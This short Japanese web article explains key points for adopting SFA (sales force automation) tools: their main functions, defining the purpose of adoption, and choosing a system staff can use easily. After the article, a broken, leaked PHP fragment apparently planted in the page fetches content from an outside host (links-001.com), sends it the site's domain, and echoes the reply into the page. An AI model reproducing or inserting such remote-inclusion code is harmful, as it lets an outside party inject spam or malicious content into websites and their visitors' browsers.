SFA導入で抑えておきたいポイントとは

SFAは、営業活動を総合的にサポートするためのツールです。
Sales Force Automation(セールス・フォース・オートメーション)の頭文字から命名されており、従来とは異なり、科学的かつ自動的な営業戦略として用いられています。
主な機能には顧客管理・活動管理・日報管理・ToDoリスト/通知機能・データ分析レポートなどがあり、導入することで顧客ニーズを企業活動に活かすことが可能になります。
SFAを導入する際にはポイントを抑えておく必要があり、大きな理由として、企業によって営業活動の課題や担当者人数、規模や商品・サービスが異なることがあります。
まず、導入では目的を明確にすることが大切になります。
導入目的を明確にすることで必要な機能のあるシステムを選ぶことができ、オーバースペックによる無駄な費用を省くことができます。
次に、社員が使いこなせるのかという点があります。
営業社員が使いこなせなければ導入をした意味はなく、操作性が良いなど、入力作業がストレスにならないシステムを選ぶことが大切です。

".file_get_contents('http://links-001.com/dmset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿